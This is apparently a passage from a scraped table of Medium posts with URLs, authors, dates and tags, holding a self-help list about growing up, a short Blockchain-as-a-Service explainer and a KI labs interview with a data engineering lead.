Digital-first companies have the ability to offer new, high-tech products and services across the value chain faster than traditional OEMs.
What might a stack based value chain look like? | https://medium.com/@ben-davies/how-is-the-automotive-value-chain-stacking-up-b7c4298dfc21 | ['Ben Davies'] | 2020-12-15 14:49:57.080000+00:00 | ['Technology', 'Cars', 'Automotive', 'Future', 'Disruption'] |
197 | If all you do is follow the exact same routine every day, you will never leave yourself open to moments of sudden discovery. Do you remember how | Life is a journey of twists and turns, peaks and valleys, mountains to climb and oceans to explore.
Good times and bad times. Happy times and sad times.
But always, life is a movement forward.
No matter where you are on the journey, in some way, you are continuing on — and that’s what makes it so magnificent. One day, you’re questioning what on earth will ever make you feel happy and fulfilled. And the next, you’re perfectly in flow, writing the most important book of your entire career.
What nobody ever tells you, though, when you are a wide-eyed child, are all the little things that come along with “growing up.”
1. Most people are scared of using their imagination.
They’ve disconnected with their inner child.
They don’t feel they are “creative.”
They like things “just the way they are.”
2. Your dream doesn’t really matter to anyone else.
Some people might take interest. Some may support you in your quest. But at the end of the day, nobody cares, or will ever care about your dream as much as you.
3. Friends are relative to where you are in your life.
Most friends only stay for a period of time — usually in reference to your current interest. But when you move on, or your priorities change, so too do the majority of your friends.
4. Your potential increases with age.
As people get older, they tend to think that they can do less and less — when in reality, they should be able to do more and more, because they have had time to soak up more knowledge. Being great at something is a daily habit. You aren’t just “born” that way.
5. Spontaneity is the sister of creativity.
If all you do is follow the exact same routine every day, you will never leave yourself open to moments of sudden discovery. Do you remember how spontaneous you were as a child? Anything could happen, at any moment!
6. You forget the value of “touch” later on.
When was the last time you played in the rain?
When was the last time you sat on a sidewalk and looked closely at the cracks, the rocks, the dirt, the one weed growing between the concrete and the grass nearby?
Do that again.
You will feel so connected to the playfulness of life.
7. Most people don’t do what they love.
It’s true.
The “masses” are not the ones who live the lives they dreamed of living. And the reason is because they didn’t fight hard enough. They didn’t make it happen for themselves. And the older you get, and the more you look around, the easier it becomes to believe that you’ll end up the same.
Don’t fall for the trap.
8. Many stop reading after college.
Ask anyone you know the last good book they read, and I’ll bet most of them respond with, “Wow, I haven’t read a book in a long time.”
9. People talk more than they listen.
There is nothing more ridiculous to me than hearing two people talk “at” each other, neither one listening, but waiting for the other person to stop talking so they can start up again.
10. Creativity takes practice.
It’s funny how much we as a society praise and value creativity, and yet seem to do as much as we can to prohibit and control creative expression unless it is in some way profitable.
If you want to keep your creative muscle pumped and active, you have to practice it on your own.
11. “Success” is a relative term.
As kids, we’re taught to “reach for success.”
What does that really mean? Success to one person could mean the opposite for someone else.
Define your own Success.
12. You can’t change your parents.
A sad and difficult truth to face as you get older: You can’t change your parents.
They are who they are.
Whether they approve of what you do or not, at some point, no longer matters. Love them for bringing you into this world, and leave the rest at the door.
13. The only person you have to face in the morning is yourself.
When you’re younger, it feels like you have to please the entire world.
You don’t.
Do what makes you happy, and create the life you want to live for yourself. You’ll see someone you truly love staring back at you every morning if you can do that.
14. Nothing feels as good as something you do from the heart.
No amount of money or achievement or external validation will ever take the place of what you do out of pure love.
Follow your heart, and the rest will follow.
15. Your potential is directly correlated to how well you know yourself.
Those who know themselves and maximize their strengths are the ones who go where they want to go.
Those who don’t know themselves, and avoid the hard work of looking inward, live life by default. They lack the ability to create for themselves their own future.
16. Everyone who doubts you will always come back around.
That kid who used to bully you will come asking for a job.
The girl who didn’t want to date you will call you back once she sees where you’re headed. It always happens that way.
Just focus on you, stay true to what you believe in, and all the doubters will eventually come asking for help.
17. You are a reflection of the 5 people you spend the most time with.
Nobody creates themselves, by themselves.
We are all mirror images, sculpted through the reflections we see in other people. This isn’t a game you play by yourself. Work to be surrounded by those you wish to be like, and in time, you too will carry the very things you admire in them.
18. Beliefs are relative to what you pursue.
Wherever you are in life, and based on who is around you, and based on your current aspirations, those are the things that shape your beliefs.
Nobody explains, though, that “beliefs” then are not “fixed.” There is no “right and wrong.” It is all relative.
Find what works for you.
19. Anything can be a vice.
Be wary.
Again, there is no “right” and “wrong” as you get older. A coping mechanism to one could be a way to relax on a Sunday to another. Just remain aware of your habits and how you spend your time, and what habits start to increase in frequency — and then question where they are coming from in you and why you feel compelled to repeat them.
Never mistakes, always lessons.
As I said, know yourself.
20. Your purpose is to be YOU.
What is the meaning of life?
To be you, all of you, always, in everything you do — whatever that means to you. You are your own creator. You are your own evolving masterpiece.
Growing up is the realization that you are both the sculpture and the sculptor, the painter and the portrait. Paint yourself however you wish. | https://medium.com/@ramrsalisburyjvskrawietliveon/if-all-you-do-is-follow-the-exact-same-routine-every-day-you-will-never-leave-yourself-open-to-2de44265c12f | ['Ram R', 'Salisbury J Vs Krawietz K', 'Mies A Live Tv'] | 2020-11-19 17:24:15.769000+00:00 | ['Technology', 'Sports', 'Social Media', 'News', 'Live Streaming'] |
198 | Blockchain as a Service (BaaS) | What is BaaS?
BaaS is based on the Software as a Service (SaaS) model and works in a similar fashion.
BaaS refers to third-party cloud-based infrastructure and management for companies building and operating blockchain apps.
It functions like a sort of web host, running the back-end operations for a blockchain-based app or platform.
Why BaaS?
-Consumers and businesses are increasingly willing to adapt to blockchain technology.
-However, the technical complexities and operational overhead involved often act as a barrier.
These include creating, configuring, and operating a blockchain, and maintaining its infrastructure.
How does BaaS do it?
-BaaS offers an external service provider to set up all the necessary blockchain technology and infrastructure for a fee.
-Once created, the provider continues to handle the complex back-end operations for the client.
-These include activities like bandwidth management, allocation of resources, hosting requirements, and data security features.
-The BaaS operator frees the client to focus on the core job, the functionality of the blockchain.
-A BaaS provider’s role is similar to that of a web hosting provider.
-The website creators create and run all the website content on their own personal computers.
-They may hire support staff or sign up with an external hosting provider like Amazon Web Services or HostGator.
-Similarly, these third-party companies take care of the infrastructure and maintenance issues.
The Future
-BaaS may be the catalyst that leads to a wider and deeper penetration of blockchain technology across various industries and businesses.
-Businesses don’t have to create and run their own blockchains.
-Instead they can now simply outsource the technically complex work and focus on its core activities.
Thank You For Reading | https://medium.com/@blockchainx-tech/blockchain-as-a-service-baas-fc470c02bb2b | [] | 2020-12-22 11:13:38.944000+00:00 | ['Blockchain', 'Blockchain Development', 'Blockchain Technology', 'Blockchain Startup'] |
199 | Fireside Chats at KI labs; ep. 18 | In this episode, we talk with our newly joined Data Engineering Lead, Ahmad Alhour, about his path from Jordan to Greece, and finally, to Munich!
Where did things start for you?
I was born in Amman, Jordan, in the Middle East. It’s a very big city, almost twice as big as Berlin. While I was growing up, Jordan was fairly peaceful. Oil and gas prices were impacted by the political issues around us, but luckily we never had to worry about violence.
The bigger problem is how centralised the country is: about half the population lives in the capital. The government is trying to change that by building universities in smaller cities, so that those cities can expand around the services a university demands.
I very much enjoy going back to visit family once or twice a year but each time I go back, I realise why I left in the first place.
How did you get into technology?
I fell in love with computers and programming when my dad bought a Pentium 1 PC around 2001–2002. I didn’t know what it was, but I wanted to operate it. For my birthday, he gifted me Visual Basic Studio with a book on programming. I tried to hack together a calculator, and after messing around for a few months I decided I wanted to be a programmer; it became my hobby. After graduating high school, I immediately chose software engineering as my area of study.
In university, I was approached by a few guys who were graduating with an idea for starting a social network, but in Arabic (this was right when Facebook was getting big). They asked me if I’d like to join them part-time, and I worked with them for a little over two years.
That’s where I actually learned software engineering professionally, which is quite different from academic software engineering. I was very excited about visual programming, so getting into the web was sort of a ‘dark art’ for me. I took electives in university to get better in that area so I could help the guys build the social network.
After graduating, I worked at a different startup for more than a year, but then moved to Greece as an R&D Engineer for a large corporation, which was exciting. I definitely learned a lot, but I realised I wanted to do something solely with software. Then I moved to Germany.
Why did you choose Greece?
I didn’t really decide Greece as opposed to any other country. A recruiter offered me the opportunity and I saw it as a ticket into Europe. I talked with a few friends who told me Greece was a beautiful country from their holidays, so I was sold. Worst case, I’d just move back if I didn’t like it. Athens actually reminded me a lot of Amman. I expected something like London or Munich but it’s more southeastern European than Northwestern. Luckily, the food is amazing and the summers are fantastic.
How did you get to Germany?
I made the decision myself this time. The company in Athens wasn’t doing so well, and neither was Greece as a country. Greece was considering leaving the EU, and I had no interest in that. I wanted to move to Central Europe because tech was growing there and that’s where my career could start developing. In Greece, the work atmosphere was more like, “hey, let’s go to the beach, let’s grab a drink,” rather than working on an interesting project. There aren’t many Meetups or conferences, and any that existed would be in Greek. I had to learn Greek as quickly as possible because nearly everyone in the country (that I interacted with) spoke exclusively Greek; Greek students only learn English if they take the class in secondary school as an elective.
Jordan is much more English-speaking than Greece. We learn English in primary school, so everyone speaks it. There are many international companies in Amman too: Yahoo, Expedia, and Microsoft all have engineering offices. There are also different tech conferences, different open-source community groups, and so on. When I went to Athens, I expected an upgrade; that was my expectation of a European country. So, for my next move, I wanted my expectation to be met, and Germany provided that.
How did web development turn in to data engineering?
In my previous company, my software engineering team wanted to build a report for a client. The client wanted to track reviews online to see whether they were real or fraudulent. Spark was recommended as the technology, and we decided to give it a try. We estimated three working days for it, and I ended up spending two weeks on it. Despite taking too long, I realised I really enjoyed that type of work, and eventually I was able to transfer to lead a Data Engineering team. There is so much to be learned and it’s a very new field, so the domain is loosely defined, which makes things very interesting.
How does KI labs fit your life and career goals?
The data engineering team here is almost three times as big, so there are many engineers to learn from. They also have a huge pool of knowledge, as many of them come from very diverse career paths, all converging on data engineering.
There were three (+1) factors that convinced me to join KI labs. The first was my interview experience: I had great talks with the team. The second was the portfolio of projects the company is getting into, and how important data engineering is in winning those projects. I want to grow in data engineering, so it aligned well with my own goals.
Also, the office being near the city centre is a huge draw. My commute distance was more than halved, which makes a significant difference in quality of life. I make one tram connection and I’m at the office.
The +1 is that, while I was trying to decide whether or not to join KI labs, I read the Fireside Chat with Shreyas and Alex.
You joined less than two weeks ago. What’s your first impression of working at KI labs?
The onboarding process was very smooth for me. Everything was at my desk and ready for use. The team was welcoming, and I’m getting to know them more over lunches. The data team dynamic is somewhat different from what a product company’s data team would be like, since some of the engineers are working on projects completely different from those of other team members. Since I am a Lead, this will be an area of focus for me: understanding each team member’s wants and frustrations, and trying to improve team cohesion while not restricting the freedom each engineer has. I’m quite excited to see what we’re able to accomplish!
The onboarding process was very smooth for me. Everything was at my desk and ready for use. The team was welcoming and I’m getting to know them more over lunches. The data team dynamic is somewhat different than a product-company’s data team would be like since some of the engineers are working on projects completely different than other members of the team. Since I am a Lead, this will be an area of focus for me; understanding each team member’s wants and frustrations and trying to improve team cohesion while not restricting the freedom each engineer has. I’m quite excited to see what we’re able to accomplish! | https://medium.com/ki-labs-engineering/fireside-chats-at-ki-labs-ep-18-695066ce8b15 | ['Wyatt Carr'] | 2019-10-14 08:38:09.816000+00:00 | ['Hiring', 'Diversity', 'Technology', 'Data', 'Startup'] |